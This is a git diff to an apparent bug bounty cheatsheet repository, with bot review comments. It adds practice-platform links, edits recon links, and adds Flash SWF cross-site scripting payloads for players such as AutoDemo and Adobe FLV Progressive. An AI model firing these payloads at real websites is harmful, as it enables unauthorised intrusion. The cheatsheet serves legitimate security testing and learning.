diff --git a/README.md b/README.md index 921f75d..ee987dd 100644 --- a/README.md +++ b/README.md @@ -4,6 +4,7 @@ - [Books](cheatsheets/books.md) - [Special Tools](cheatsheets/special-tools.md) - [Recon](cheatsheets/recon.md) +- [Practice Platforms](cheatsheets/practice-platforms.md) - [XSS](cheatsheets/xss.md) - [SQLI](cheatsheets/sqli.md) - [SSRF](cheatsheets/ssrf.md) @@ -53,3 +54,4 @@ We like to keep our Markdown files as uniform as possible. So if you submit a PR - [yasinS](https://github.com/yasinS) - [neutrinoguy](https://github.com/neutrinoguy) - [kuromatae](https://github.com/kuromatae) +- [And many more ...](https://github.com/EdOverflow/bugbounty-cheatsheet/graphs/contributors) diff --git a/cheatsheets/practice-platforms.md b/cheatsheets/practice-platforms.md new file mode 100644 index 0000000..fdd8259 --- /dev/null +++ b/cheatsheets/practice-platforms.md @@ -0,0 +1,9 @@ +## Practice Platforms + +- [Pentesterlab](https://pentesterlab.com/) +- [XSS Game](https://xss-game.appspot.com/) +- [Hack This Site](https://www.hackthissite.org) +- [Root-Me](https://www.root-me.org) +- [HackTheBox](https://www.hackthebox.eu) +- [Hack Me](https://hack.me) +- [CTF 365](https://ctf365.com) diff --git a/cheatsheets/special-tools.md b/cheatsheets/special-tools.md index 9133c1c..3af076f 100644 --- a/cheatsheets/special-tools.md +++ b/cheatsheets/special-tools.md 
@@ -38,8 +38,8 @@ otherapp.10.0.0.1.nip.io - [VirusTotal](https://virustotal.com/en-gb/domain/google.com/information/) (WHOIS, DNS, and subdomain recon) - [crt.sh](https://crt.sh/?q=%25.uber.com) (SSL certificate search) - [Google CT](https://transparencyreport.google.com/https/certificates) (SSL certificate transparency search) -- [Wayback Machine](https://archive.org/web/) (Find Intresting stuff hosted on the Domain in past) -- http://ipv4info.com (Find all domains inside an IP block owned by the Company/Organization) +- [PenTest Tools](https://pentest-tools.com/information-gathering/google-hacking) (Google dorks) + **Report Templates** diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md index 9fd8b26..26f0eae 100644 --- a/cheatsheets/xss.md +++ b/cheatsheets/xss.md @@ -120,7 +120,7 @@ javas cript://www.google.com/%0Aalert(1) - FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert`1` -- videoJS: `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29` +- videoJS: `video-js.swf?readyFunction=confirm` and `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29` - YUI "io.swf": `io.swf?yid=\"));}catch(e){alert(document.domain);}//` @@ -128,6 +128,10 @@ javas cript://www.google.com/%0Aalert(1) - Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()` +- AutoDemo: `control.swf?onend=javascript:alert(1)//` + +- Adobe FLV Progressive: `/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//` and `/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//` + - Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//` - JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)` 
@@ -136,7 +140,7 @@ javas cript://www.google.com/%0Aalert(1) - FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf` -_Note: Useful reference on SWF XSS construction from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._ +_Note: Useful reference on constructing Flash-based XSS payloads from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._ **Lightweight Markup Languages**
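Review bot: in the `cheatsheets/special-tools.md` hunk, the Wayback Machine and ipv4info.com entries are removed while PenTest Tools is added, which reads as an unintended loss of two recon references rather than a replacement; restore `- [Wayback Machine](https://archive.org/web/) (Find interesting stuff hosted on the domain in the past)` and the `http://ipv4info.com` line (fixing the "Intresting" typo while here) next to the new PenTest Tools line, or explain in the PR description why they are being dropped. Also check that the added bare `+` line does not leave two consecutive blank lines before `**Report Templates**`.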
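Review bot: the new `cheatsheets/practice-platforms.md` lists bare links with no description, whereas `cheatsheets/special-tools.md` annotates each entry with a parenthetical such as `(SSL certificate search)`; add a short note per platform (for example whether it offers guided web exercises, full machines, or timed CTF events) so readers can choose without visiting each site, and make the trailing-slash usage consistent across the seven URLs.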
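Review bot: in the second `cheatsheets/xss.md` hunk, the two Adobe FLV Progressive paths start with a leading `/` (`/main.swf?...`, `/FLVPlayer_Progressive.swf?...`) while the AutoDemo entry added in the same hunk and the neighbouring Open Flash Chart and Banner.swf entries do not; pick one convention for the list, and consider adding a source reference for the AutoDemo and FLV Progressive entries the way the FlowPlayer section cites MWR Labs.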